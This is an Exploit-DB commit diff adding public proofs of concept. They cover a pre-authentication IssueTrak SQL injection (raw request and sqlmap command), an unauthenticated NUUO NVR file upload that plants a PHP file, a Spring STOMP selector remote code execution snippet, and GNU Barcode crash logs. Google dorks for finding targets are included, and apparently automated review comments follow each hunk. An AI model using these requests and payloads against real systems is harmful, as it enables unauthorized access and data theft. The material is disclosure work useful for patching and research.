DB: 2018-05-30

9 changes to exploits/shellcodes

GNU Barcode 0.99 - Buffer Overflow
GNU Barcode 0.99 - Memory Leak
IssueTrak 7.0 - SQL Injection
Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection
NUUO NVRmini2 / NVRsolo - Arbitrary File Upload
MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting
Pivotal Spring Java Framework < 5.0 - Remote Code Execution
Facebook Clone Script 1.0.5 - 'search' SQL Injection
Facebook Clone Script 1.0.5 - Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2018-05-30 05:01:46 +00:00
parent 9fd8680103
commit 96e4f1686b
10 changed files with 762 additions and 0 deletions


@ -0,0 +1,71 @@
================
Exploit Title: SQL Injection Vulnerability in Issue Trak <= 7.0 (Possibly applicable up to version 9.7)
Date: 05-28-2018
Vendor Homepage: http://issuetrak.com
Version: Confirmed 7.0; <= 7.0 extremely likely; up to 9.7 very likely
Google Dork: inurl:"IssueTrak" inurl:"asp"
Discovered By: Chris Anastasio
================
Vulnerable Endpoint
===================
www.example.com/IssueTrak/IssueSearch_Process.asp
Vulnerable Parameters
=====================
Status
Priority
inp_IssueType
SubmittedBy
EnteredBy
AssignedTo
AssignedBy
NextActionBy
ClosedBy
ProjectManager
inp_OrgID
Raw HTTP Request
===========================
POST /IssueTrak/IssueSearch_Process.asp HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 905
TestField=dummy&Mode=&Deleted=false&ReportID=x&Status=*&SubstatusID=&Priority=&inp_IssueType=&HiddenSubtype=&HiddenSubtype2=&inp_IssueSubTypeMem=-1&SearchAll=fds&Subject=&NoteText=&Solution=&UserDef1=&CSOneID=&CSTwoID=&UserDef3=&CSThreeID=&UserDef4=&CSFourID=&SubmittedBy=&EnteredBy=&AssignedTo=&EverAssignedTo=&AssignedBy=&NextActionBy=&ClosedBy=&ProjectManager=&inp_OrgID=&OrganizationIssues=&TaskAssignedTo=&method_TargetDate=&start_TargetDate=&end_TargetDate=&method_DateOpened=&start_DateOpened=&end_DateOpened=&method_DateClosed=&start_DateClosed=&end_DateClosed=&TimeOpen=&TimeOpenDays=More&AdjTimeOpen=&AdjTimeOpenDays=More&Hours=&TimeOpenHours=More&TaskDescription=&TaskAssignedToName=&method_TaskDateCompleted=&start_TaskDateCompleted=&end_TaskDateCompleted=&Title=&OutputOptions=BriefList&ShowCriteria=on&SortOn1=&SortOrder1=Asc&SortOn2=&SortOrder2=Asc&SortOn3=&SortOrder3=Asc
SQLMap command
==============
sqlmap -r issueTrakSearchReq.txt --dbms=mssql --level=5 --batch
Notes:
- "issueTrakSearchReq.txt" should be a plain text file containing the raw HTTP request shown above.
- The "Host" header of the HTTP request should be updated with an IP address that hosts an IssueTrak 7.0 installation.
Notes
=====
- A SQL injection vulnerability has been identified in IssueTrak 7.0 which, if successfully exploited, could allow an attacker to access sensitive information in the database.
- Authentication is generally required in order to hit this endpoint. If a non SQL injection request is made the reuslt is a redirect to the login page. However, it seems that on the back end, this request touches the database even without authentication, making it exploitable from a pre-authentication vantage point.
- IssueTrak 7.0 was released in 2006
Timeline
========
2018-05-18: Initial vendor contact
2018-05-21: Vendor implies that this version of IssueTrak is no longer supported. Also states that releases starting with 9.7 the application does not suffer from thsi vulnerability
2016-05-28: PoC details published
About Illumant
==============
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/
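Review bot: the timeline at the end of this hunk is internally inconsistent: the publication entry reads `2016-05-28: PoC details published` while the two entries before it and the `Date: 05-28-2018` header are from 2018, so the year is almost certainly a typo and should be corrected before this ships. Two documentation points in the same region: the `Notes:` block under the sqlmap command and the `Notes` section a few lines below are two separate sections with the same name and should be merged, and the vendor statement on the 2018-05-21 line (releases from 9.7 onward are not affected) belongs in a Solution/Fix line near the header, so a reader who stops at `Version: ... up to 9.7 very likely` learns that an upgrade path is known. The sentence claiming the endpoint touches the database before the login redirect is what makes this a pre-authentication issue and drives the severity, but the hunk gives no evidence for it beyond the sentence itself; a line on how that was confirmed would make the advisory verifiable.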


@ -0,0 +1,75 @@
# Exploit Title: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability
# Google Dork: intitle:NUUO Network Video Recorder Login
# Date: 2018-05-20
# Exploit Author: M3@Pandas
# Vendor Homepage: http://www.nuuo.com
# Software Link: N/A
# Version: all
# Tested on: PHP Linux
# CVE : CVE-2018-11523
==========================
Advisory: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability
Author: M3@pandas From DBAppSecurity
Affected Version: All
==========================
Vulnerability Description
==========================
Recetly, I found an Arbitrary File Upload Vulnerability in 'NUUO NVRmini2' program, NVRmini2 is widely used all over
the world.
Vulnerable cgi: /upload.php
<?php
//echo $_FILES['userfile']['type'];
//echo ":";
//echo $_FILES['userfile']['size'];
//echo ":";
//echo urldecode($_FILES['userfile']['name']);
//echo ":";
//echo $_FILES['userfile']['tmp_name'];
//echo ":";
//echo $_FILES['userfile']['error'];
//echo ":";
echo $_FILES['userfile']['name'];
copy($_FILES["userfile"]["tmp_name"],$_FILES['userfile']['name']);
?>
As the code above, no any filter, so we can upload a php shell directly to the web server.
==========================
POC EXP
==========================
1. Upload 'nuuonvr.php' to web root path:
POST /upload.php HTTP/1.1
Host: 192.168.10.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=--------969849961
Content-Length: 162
----------969849961
Content-Disposition: form-data; name="userfile"; filename="nuuonvr.php"
?php phpinfo();@unlink(__FILE__);?
----------969849961--
2. Check if the php file is uploaded successfully:
GET http://192.168.10.1/nuuonvr.php
If the page returns phpinfo info, target is vulnerable!
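Review bot: the root cause is visible in the quoted `upload.php`, but the hunk never states the fix, so add a remediation line: `copy($_FILES["userfile"]["tmp_name"],$_FILES['userfile']['name']);` writes the upload under the client-supplied filename, relative to the web root, with no authentication on the endpoint, no extension or content-type allow-list, no server-generated name and no storage location outside the document root, and each of those is a separate control worth listing for the vendor and for anyone triaging CVE-2018-11523. Metadata: `Version: all` and `Tested on: PHP Linux` are not verifiable statements; the firmware build(s) actually tested should be named, and `Software Link: N/A` should point at the vendor's download or advisory page if one exists. The request uses `Host: 192.168.10.1` without saying this is a lab address; label it as such so it is not mistaken for a real target.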


@ -0,0 +1,28 @@
# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution
# Date: 2018-05-28
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage:
# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development
# CVE: CVE: CVE-2018-1270
# Version: <= 5.0.x
# Description: By connecting to spring STOMP, and putting the key for "selector"
# header, we can execute code on Spring.
# POC:
# Here' we are writting java commands to be executed within the selector header
# Connecting to a web socket using SockJS
# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable
var header = {"selector":"T(java,lang.Runtime).getRuntime().exec('open -a Calculator"};
var socket = new SockJS('/gs-guide-websocket');
var stompClient = webstomp.over(socket);
stompClient.connect({}, function (frame){
setConnected(true);
console.log('Connected: ' + frame);
stompClient.subscribe('/topic/greetings', function(greeting){
showGreeting(JSON.parse(greeting.body).content);
},header);
});
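Review bot: the affected range is stated two different ways in this hunk, `< 5.0` in the title and `<= 5.0.x` on the `# Version:` line, and neither matches the published scope of CVE-2018-1270 (Spring Framework 5.0.x before 5.0.5 and 4.3.x before 4.3.15); the header should carry the precise affected and fixed versions so a reader can tell that a 5.0.5 or 4.3.15 deployment is out of scope, and a `# Fix:` line naming the upgrade is missing. `# CVE: CVE: CVE-2018-1270` has a duplicated label. The snippet also cannot run as committed: `setConnected` and `showGreeting` are helpers from the Spring guide the `# Ref:` line points to and are not defined here, and the `header` literal on the first code line is not a well-formed JavaScript string, so anyone reproducing this for verification hits a parse error before the STOMP connect.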


@ -0,0 +1,188 @@
# GNU Barcode 0.99 - Buffer Overflow
# Vendor: The GNU Project | Free Software Foundation, Inc.
# Product web page: https://www.gnu.org/software/barcode/
# https://directory.fsf.org/wiki/Barcode
# Author: Gjoko 'LiquidWorm' Krstic
# Tested on: Ubuntu 16.04.4
# Affected version: 0.99
# Summary: GNU Barcode is a tool to convert text strings to printed bars.
# It supports a variety of standard codes to represent the textual strings
# and creates postscript output.
# Desc: The vulnerability is caused due to a boundary error in the processing
# of an input file, which can be exploited to cause a buffer overflow when a
# user processes e.g. a specially crafted file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
code93.c:
165: strcat(partial, codeset[code]);
166: checksum_str[checksum_len++] = code;
167:
168: /* Encode the second character */
169: code = strchr(alphabet, shiftset2[(int)(text[i])]) - alphabet;
170: strcat(partial, codeset[code]);
171: checksum_str[checksum_len++] = code;
lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -i id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog
%%Page: 1 1
% Printing barcode for "W+G$A+M%KWWGWWWWWWWW9WW", scaled 1.00, encoded using "code 39"
% The space/bar succession is represented by the following widths (space first):
% 01311313111333111111113111313111111133131131313111131111311311311131311313111131111131313113111111331333111111133311111111111133131333111111133311111113331111111333111111133311111113331111111333111111133311111111133113111333111111133311111113111113311131131311
[
% height xpos ypos width height xpos ypos width
[75.00 10.50 15.00 0.85] [75.00 14.50 15.00 0.85]
[75.00 17.50 15.00 2.85] [75.00 21.50 15.00 2.85]
[75.00 24.50 15.00 0.85] [70.00 27.50 20.00 2.85]
[70.00 33.50 20.00 2.85] [70.00 36.50 20.00 0.85]
[70.00 38.50 20.00 0.85] [70.00 40.50 20.00 0.85]
[70.00 42.50 20.00 0.85] [70.00 46.50 20.00 0.85]
[70.00 48.50 20.00 0.85] [70.00 52.50 20.00 0.85]
[70.00 56.50 20.00 0.85] [70.00 58.50 20.00 0.85]
[70.00 60.50 20.00 0.85] [70.00 62.50 20.00 0.85]
[70.00 67.50 20.00 2.85] [70.00 71.50 20.00 2.85]
[70.00 74.50 20.00 0.85] [70.00 78.50 20.00 0.85]
[70.00 82.50 20.00 0.85] [70.00 86.50 20.00 0.85]
[70.00 88.50 20.00 0.85] [70.00 91.50 20.00 2.85]
[70.00 94.50 20.00 0.85] [70.00 96.50 20.00 0.85]
[70.00 100.50 20.00 0.85] [70.00 103.50 20.00 2.85]
[70.00 106.50 20.00 0.85] [70.00 110.50 20.00 0.85]
[70.00 112.50 20.00 0.85] [70.00 116.50 20.00 0.85]
[70.00 120.50 20.00 0.85] [70.00 123.50 20.00 2.85]
[70.00 127.50 20.00 2.85] [70.00 130.50 20.00 0.85]
[70.00 132.50 20.00 0.85] [70.00 136.50 20.00 0.85]
[70.00 138.50 20.00 0.85] [70.00 140.50 20.00 0.85]
[70.00 144.50 20.00 0.85] [70.00 148.50 20.00 0.85]
[70.00 152.50 20.00 0.85] [70.00 155.50 20.00 2.85]
[70.00 158.50 20.00 0.85] [70.00 160.50 20.00 0.85]
[70.00 162.50 20.00 0.85] [70.00 167.50 20.00 2.85]
[70.00 171.50 20.00 2.85] [70.00 177.50 20.00 2.85]
[70.00 180.50 20.00 0.85] [70.00 182.50 20.00 0.85]
[70.00 184.50 20.00 0.85] [70.00 187.50 20.00 2.85]
[70.00 193.50 20.00 2.85] [70.00 196.50 20.00 0.85]
[70.00 198.50 20.00 0.85] [70.00 200.50 20.00 0.85]
[70.00 202.50 20.00 0.85] [70.00 204.50 20.00 0.85]
[70.00 206.50 20.00 0.85] [70.00 211.50 20.00 2.85]
[70.00 215.50 20.00 2.85] [70.00 219.50 20.00 2.85]
[70.00 225.50 20.00 2.85] [70.00 228.50 20.00 0.85]
[70.00 230.50 20.00 0.85] [70.00 232.50 20.00 0.85]
[70.00 235.50 20.00 2.85] [70.00 241.50 20.00 2.85]
[70.00 244.50 20.00 0.85] [70.00 246.50 20.00 0.85]
[70.00 248.50 20.00 0.85] [70.00 251.50 20.00 2.85]
[70.00 257.50 20.00 2.85] [70.00 260.50 20.00 0.85]
[70.00 262.50 20.00 0.85] [70.00 264.50 20.00 0.85]
[70.00 267.50 20.00 2.85] [70.00 273.50 20.00 2.85]
[70.00 276.50 20.00 0.85] [70.00 278.50 20.00 0.85]
[70.00 280.50 20.00 0.85] [70.00 283.50 20.00 2.85]
[70.00 289.50 20.00 2.85] [70.00 292.50 20.00 0.85]
[70.00 294.50 20.00 0.85] [70.00 296.50 20.00 0.85]
[70.00 299.50 20.00 2.85] [70.00 305.50 20.00 2.85]
[70.00 308.50 20.00 0.85] [70.00 310.50 20.00 0.85]
[70.00 312.50 20.00 0.85] [70.00 315.50 20.00 2.85]
[70.00 321.50 20.00 2.85] [70.00 324.50 20.00 0.85]
[70.00 326.50 20.00 0.85] [70.00 328.50 20.00 0.85]
[70.00 331.50 20.00 2.85] [70.00 337.50 20.00 2.85]
[70.00 340.50 20.00 0.85] [70.00 342.50 20.00 0.85]
[70.00 344.50 20.00 0.85] [70.00 346.50 20.00 0.85]
[70.00 349.50 20.00 2.85] [70.00 354.50 20.00 0.85]
[70.00 357.50 20.00 2.85] [70.00 360.50 20.00 0.85]
[70.00 363.50 20.00 2.85] [70.00 369.50 20.00 2.85]
[70.00 372.50 20.00 0.85] [70.00 374.50 20.00 0.85]
[70.00 376.50 20.00 0.85] [70.00 379.50 20.00 2.85]
[70.00 385.50 20.00 2.85] [70.00 388.50 20.00 0.85]
[70.00 390.50 20.00 0.85] [70.00 392.50 20.00 0.85]
[70.00 395.50 20.00 2.85] [70.00 398.50 20.00 0.85]
[70.00 400.50 20.00 0.85] [70.00 403.50 20.00 2.85]
[70.00 408.50 20.00 0.85] [75.00 410.50 15.00 0.85]
[75.00 414.50 15.00 0.85] [75.00 417.50 15.00 2.85]
[75.00 421.50 15.00 2.85] [75.00 424.50 15.00 0.85]
] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
[
% char xpos ypos fontsize
[(W) 32.00 10.00 12.00]
[(+) 48.00 10.00 0.00]
[(G) 64.00 10.00 0.00]
[($) 80.00 10.00 0.00]
[(A) 96.00 10.00 0.00]
[(+) 112.00 10.00 0.00]
[(M) 128.00 10.00 0.00]
[(%) 144.00 10.00 0.00]
[(K) 160.00 10.00 0.00]
[(W) 176.00 10.00 0.00]
[(W) 192.00 10.00 0.00]
[(G) 208.00 10.00 0.00]
[(W) 224.00 10.00 0.00]
[(W) 240.00 10.00 0.00]
[(W) 256.00 10.00 0.00]
[(W) 272.00 10.00 0.00]
[(W) 288.00 10.00 0.00]
[(W) 304.00 10.00 0.00]
[(W) 320.00 10.00 0.00]
[(W) 336.00 10.00 0.00]
[(9) 352.00 10.00 0.00]
[(W) 368.00 10.00 0.00]
[(W) 384.00 10.00 0.00]
] { {} forall dup 0.00 ne {
/Helvetica findfont exch scalefont setfont
} {pop} ifelse
moveto show} bind forall
% End barcode for "W+G$A+M%KWWGWWWWWWWW9WW"
showpage
%%Page: 2 2
=================================================================
==11076==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000043bc02 at pc 0x00000042189a bp 0x7fff2f160c00 sp 0x7fff2f160bf0
READ of size 1 at 0x00000043bc02 thread T0
#0 0x421899 in Barcode_93_encode /home/lqwrm/research/barcode-0.99/code93.c:169
#1 0x409ac2 in Barcode_Encode_and_Print /home/lqwrm/research/barcode-0.99/library.c:234
#2 0x402319 in main /home/lqwrm/research/barcode-0.99/main.c:564
#3 0x7f9b8745282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#4 0x404708 in _start (/home/lqwrm/research/barcode-0.99/barcode+0x404708)
0x00000043bc02 is located 32 bytes to the right of global variable '*.LC6' defined in 'code93.c' (0x43bbe0) of size 2
'*.LC6' is ascii string '1'
0x00000043bc02 is located 30 bytes to the left of global variable 'CSWTCH.16' defined in 'code93.c:146:5' (0x43bc20) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow /home/lqwrm/research/barcode-0.99/code93.c:169 Barcode_93_encode
Shadow bytes around the buggy address:
0x00008007f730: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x00008007f740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008007f750: 00 00 00 00 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
0x00008007f760: f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9
0x00008007f770: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 02 f9 f9 f9
=>0x00008007f780:[f9]f9 f9 f9 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9
0x00008007f790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008007f7a0: 01 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x00008007f7b0: 00 00 00 00 00 00 00 00 01 f9 f9 f9 f9 f9 f9 f9
0x00008007f7c0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
0x00008007f7d0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==11076==ABORTING
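Review bot: the impact claim in `# Desc:` ("could allow execution of arbitrary code") is stronger than what the attached report supports: AddressSanitizer reports a one-byte out-of-bounds READ of a global (`global-buffer-overflow`, `READ of size 1`) at `code93.c:169`, which is a crash or information-exposure primitive, not a write, so the description should say so or give evidence for the stronger claim. The quoted source already shows what is missing: `code = strchr(alphabet, shiftset2[(int)(text[i])]) - alphabet;` indexes the `shiftset2` table with the raw input byte and never checks that the byte is within the table's range (a byte above 0x7f is negative where `char` is signed, which is consistent with the read landing in the neighbouring globals named in the report), and if the looked-up character is not in `alphabet`, `strchr` returns NULL and `code` becomes a garbage offset for the following `codeset[code]` use; naming that bounds check is more useful to a maintainer than the generic "boundary error" wording. Documentation: the reproduction is `./barcode -i id:000034,sig:06,src:000000,op:havoc,rep:128`, an AFL crash file that is not included in this hunk, so the crash is not reproducible from the submission alone; attach the file or describe its content (the `%%Page: 2 2` line shows the crash occurs on the second barcode in the file, after a valid code 39 string). Unlike the other entries in this commit, the header has no `# Date:` line.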


@ -0,0 +1,207 @@
# GNU Barcode 0.99 - Memory Leak
# Vendor: The GNU Project | Free Software Foundation, Inc.
# Product web page: https://www.gnu.org/software/barcode/
# https://directory.fsf.org/wiki/Barcode
# Affected version: 0.99
# Tested on: Ubuntu 16.04.4
# Author: Gjoko 'LiquidWorm' Krstic
# Summary: GNU Barcode is a tool to convert text strings to printed bars.
# It supports a variety of standard codes to represent the textual strings
# and creates postscript output.
# Desc: GNU Barcode suffers from a memory leak vulnerability, which can be exploited
# by malicious people to cause a DoS (Denial of Service). The vulnerability is
# caused due to an error in the 'cmdline.c', which can be exploited to cause a
# memory leak via a specially crafted file. The vulnerability is confirmed in
# version 0.99. Other versions may also be affected.
cmdline.c:
128: int commandline(struct commandline *args, int argc, char **argv,
129: char *errorhead)
130: {
131: struct commandline *ptr;
132: char *getopt_desc = (char *)calloc(512, 1);
133: int desc_offset = 0;
134: int opt, retval;
135: char *value;
lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -b id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog
%%Page: 1 1
% Printing barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128", scaled 1.00, encoded using "code 128-B"
% The space/bar succession is represented by the following widths (space first):
% 02112141341111132221411221212411211241142121224111122141142121132221421121412213212211231221231221231221231222211322212311122321142121421121221143212211231222231121122321142121212411411223212211231221231221231221231221231221231221122321341111112423212211224111211244112121341111411221122321212411122141112423212211232212232113112221321132331112
[
% height xpos ypos width height xpos ypos width
[75.00 11.00 15.00 1.85] [75.00 13.50 15.00 0.85]
[75.00 16.50 15.00 0.85] [70.00 21.50 20.00 0.85]
[70.00 27.00 20.00 3.85] [70.00 30.50 20.00 0.85]
[70.00 32.50 20.00 0.85] [70.00 35.50 20.00 2.85]
[70.00 40.00 20.00 1.85] [70.00 43.50 20.00 0.85]
[70.00 48.50 20.00 0.85] [70.00 51.00 20.00 1.85]
[70.00 54.50 20.00 0.85] [70.00 57.50 20.00 0.85]
[70.00 62.00 20.00 3.85] [70.00 65.50 20.00 0.85]
[70.00 68.50 20.00 0.85] [70.00 71.00 20.00 1.85]
[70.00 76.50 20.00 0.85] [70.00 80.00 20.00 3.85]
[70.00 84.50 20.00 0.85] [70.00 87.50 20.00 0.85]
[70.00 91.00 20.00 1.85] [70.00 96.50 20.00 0.85]
[70.00 98.50 20.00 0.85] [70.00 101.00 20.00 1.85]
[70.00 104.50 20.00 0.85] [70.00 109.50 20.00 0.85]
[70.00 113.00 20.00 3.85] [70.00 117.50 20.00 0.85]
[70.00 120.50 20.00 0.85] [70.00 123.50 20.00 2.85]
[70.00 128.00 20.00 1.85] [70.00 131.50 20.00 0.85]
[70.00 137.00 20.00 1.85] [70.00 139.50 20.00 0.85]
[70.00 142.50 20.00 0.85] [70.00 147.50 20.00 0.85]
[70.00 151.00 20.00 1.85] [70.00 154.50 20.00 2.85]
[70.00 158.50 20.00 0.85] [70.00 162.00 20.00 1.85]
[70.00 164.50 20.00 0.85] [70.00 168.50 20.00 2.85]
[70.00 172.00 20.00 1.85] [70.00 175.50 20.00 0.85]
[70.00 179.50 20.00 2.85] [70.00 183.00 20.00 1.85]
[70.00 186.50 20.00 0.85] [70.00 190.50 20.00 2.85]
[70.00 194.00 20.00 1.85] [70.00 197.50 20.00 0.85]
[70.00 201.50 20.00 2.85] [70.00 205.00 20.00 1.85]
[70.00 209.00 20.00 1.85] [70.00 212.50 20.00 0.85]
[70.00 215.50 20.00 2.85] [70.00 220.00 20.00 1.85]
[70.00 223.50 20.00 0.85] [70.00 227.50 20.00 2.85]
[70.00 230.50 20.00 0.85] [70.00 233.00 20.00 1.85]
[70.00 237.50 20.00 2.85] [70.00 241.50 20.00 0.85]
[70.00 245.00 20.00 3.85] [70.00 249.50 20.00 0.85]
[70.00 252.50 20.00 0.85] [70.00 258.00 20.00 1.85]
[70.00 260.50 20.00 0.85] [70.00 263.50 20.00 0.85]
[70.00 267.00 20.00 1.85] [70.00 269.50 20.00 0.85]
[70.00 275.50 20.00 2.85] [70.00 279.50 20.00 0.85]
[70.00 283.00 20.00 1.85] [70.00 285.50 20.00 0.85]
[70.00 289.50 20.00 2.85] [70.00 293.00 20.00 1.85]
[70.00 297.00 20.00 1.85] [70.00 301.50 20.00 2.85]
[70.00 304.50 20.00 0.85] [70.00 307.50 20.00 0.85]
[70.00 310.00 20.00 1.85] [70.00 314.50 20.00 2.85]
[70.00 318.50 20.00 0.85] [70.00 322.00 20.00 3.85]
[70.00 326.50 20.00 0.85] [70.00 329.50 20.00 0.85]
[70.00 332.50 20.00 0.85] [70.00 337.00 20.00 3.85]
[70.00 340.50 20.00 0.85] [70.00 345.50 20.00 0.85]
[70.00 348.00 20.00 1.85] [70.00 352.50 20.00 2.85]
[70.00 356.50 20.00 0.85] [70.00 360.00 20.00 1.85]
[70.00 362.50 20.00 0.85] [70.00 366.50 20.00 2.85]
[70.00 370.00 20.00 1.85] [70.00 373.50 20.00 0.85]
[70.00 377.50 20.00 2.85] [70.00 381.00 20.00 1.85]
[70.00 384.50 20.00 0.85] [70.00 388.50 20.00 2.85]
[70.00 392.00 20.00 1.85] [70.00 395.50 20.00 0.85]
[70.00 399.50 20.00 2.85] [70.00 403.00 20.00 1.85]
[70.00 406.50 20.00 0.85] [70.00 410.50 20.00 2.85]
[70.00 414.00 20.00 1.85] [70.00 417.50 20.00 0.85]
[70.00 421.50 20.00 2.85] [70.00 425.00 20.00 1.85]
[70.00 428.50 20.00 0.85] [70.00 431.00 20.00 1.85]
[70.00 435.50 20.00 2.85] [70.00 439.50 20.00 0.85]
[70.00 445.00 20.00 3.85] [70.00 448.50 20.00 0.85]
[70.00 450.50 20.00 0.85] [70.00 452.50 20.00 0.85]
[70.00 457.00 20.00 3.85] [70.00 462.50 20.00 2.85]
[70.00 466.50 20.00 0.85] [70.00 470.00 20.00 1.85]
[70.00 472.50 20.00 0.85] [70.00 476.00 20.00 1.85]
[70.00 481.50 20.00 0.85] [70.00 483.50 20.00 0.85]
[70.00 486.50 20.00 0.85] [70.00 489.00 20.00 1.85]
[70.00 496.00 20.00 3.85] [70.00 499.50 20.00 0.85]
[70.00 502.50 20.00 0.85] [70.00 505.50 20.00 0.85]
[70.00 511.00 20.00 3.85] [70.00 514.50 20.00 0.85]
[70.00 516.50 20.00 0.85] [70.00 521.50 20.00 0.85]
[70.00 524.00 20.00 1.85] [70.00 527.50 20.00 0.85]
[70.00 530.00 20.00 1.85] [70.00 534.50 20.00 2.85]
[70.00 538.50 20.00 0.85] [70.00 541.50 20.00 0.85]
[70.00 546.00 20.00 3.85] [70.00 549.50 20.00 0.85]
[70.00 552.00 20.00 1.85] [70.00 555.50 20.00 0.85]
[70.00 560.50 20.00 0.85] [70.00 562.50 20.00 0.85]
[70.00 567.00 20.00 3.85] [70.00 572.50 20.00 2.85]
[70.00 576.50 20.00 0.85] [70.00 580.00 20.00 1.85]
[70.00 582.50 20.00 0.85] [70.00 586.50 20.00 2.85]
[70.00 591.00 20.00 1.85] [70.00 594.00 20.00 1.85]
[70.00 598.50 20.00 2.85] [70.00 602.50 20.00 0.85]
[70.00 605.50 20.00 2.85] [70.00 608.50 20.00 0.85]
[70.00 612.00 20.00 1.85] [70.00 615.50 20.00 0.85]
[70.00 620.00 20.00 1.85] [70.00 622.50 20.00 0.85]
[75.00 627.00 15.00 1.85] [75.00 632.50 15.00 2.85]
[75.00 635.50 15.00 0.85] [75.00 638.00 15.00 1.85]
] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
[
% char xpos ypos fontsize
[(o) 21.00 10.00 12.00]
[(/) 32.00 10.00 0.00]
[(c) 43.00 10.00 0.00]
[(r) 54.00 10.00 0.00]
[(a) 65.00 10.00 0.00]
[(s) 76.00 10.00 0.00]
[(h) 87.00 10.00 0.00]
[(e) 98.00 10.00 0.00]
[(s) 109.00 10.00 0.00]
[(/) 120.00 10.00 0.00]
[(i) 131.00 10.00 0.00]
[(d) 142.00 10.00 0.00]
[(:) 153.00 10.00 0.00]
[(0) 164.00 10.00 0.00]
[(0) 175.00 10.00 0.00]
[(0) 186.00 10.00 0.00]
[(0) 197.00 10.00 0.00]
[(3) 208.00 10.00 0.00]
[(4) 219.00 10.00 0.00]
[(,) 230.00 10.00 0.00]
[(s) 241.00 10.00 0.00]
[(i) 252.00 10.00 0.00]
[(g) 263.00 10.00 0.00]
[(:) 274.00 10.00 0.00]
[(0) 285.00 10.00 0.00]
[(6) 296.00 10.00 0.00]
[(,) 307.00 10.00 0.00]
[(s) 318.00 10.00 0.00]
[(r) 329.00 10.00 0.00]
[(c) 340.00 10.00 0.00]
[(:) 351.00 10.00 0.00]
[(0) 362.00 10.00 0.00]
[(0) 373.00 10.00 0.00]
[(0) 384.00 10.00 0.00]
[(0) 395.00 10.00 0.00]
[(0) 406.00 10.00 0.00]
[(0) 417.00 10.00 0.00]
[(,) 428.00 10.00 0.00]
[(o) 439.00 10.00 0.00]
[(p) 450.00 10.00 0.00]
[(:) 461.00 10.00 0.00]
[(h) 472.00 10.00 0.00]
[(a) 483.00 10.00 0.00]
[(v) 494.00 10.00 0.00]
[(o) 505.00 10.00 0.00]
[(c) 516.00 10.00 0.00]
[(,) 527.00 10.00 0.00]
[(r) 538.00 10.00 0.00]
[(e) 549.00 10.00 0.00]
[(p) 560.00 10.00 0.00]
[(:) 571.00 10.00 0.00]
[(1) 582.00 10.00 0.00]
[(2) 593.00 10.00 0.00]
[(8) 604.00 10.00 0.00]
] { {} forall dup 0.00 ne {
/Helvetica findfont exch scalefont setfont
} {pop} ifelse
moveto show} bind forall
% End barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128"
showpage
%%Trailer
==2183==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 512 byte(s) in 1 object(s) allocated from:
#0 0x7fcb3aca179a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
#1 0x407be2 in commandline /home/lqwrm/research/barcode-0.99/cmdline.c:132
Direct leak of 55 byte(s) in 1 object(s) allocated from:
#0 0x7fcb3aca1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x7fcb3a8ca489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489)
SUMMARY: AddressSanitizer: 567 byte(s) leaked in 2 allocation(s).
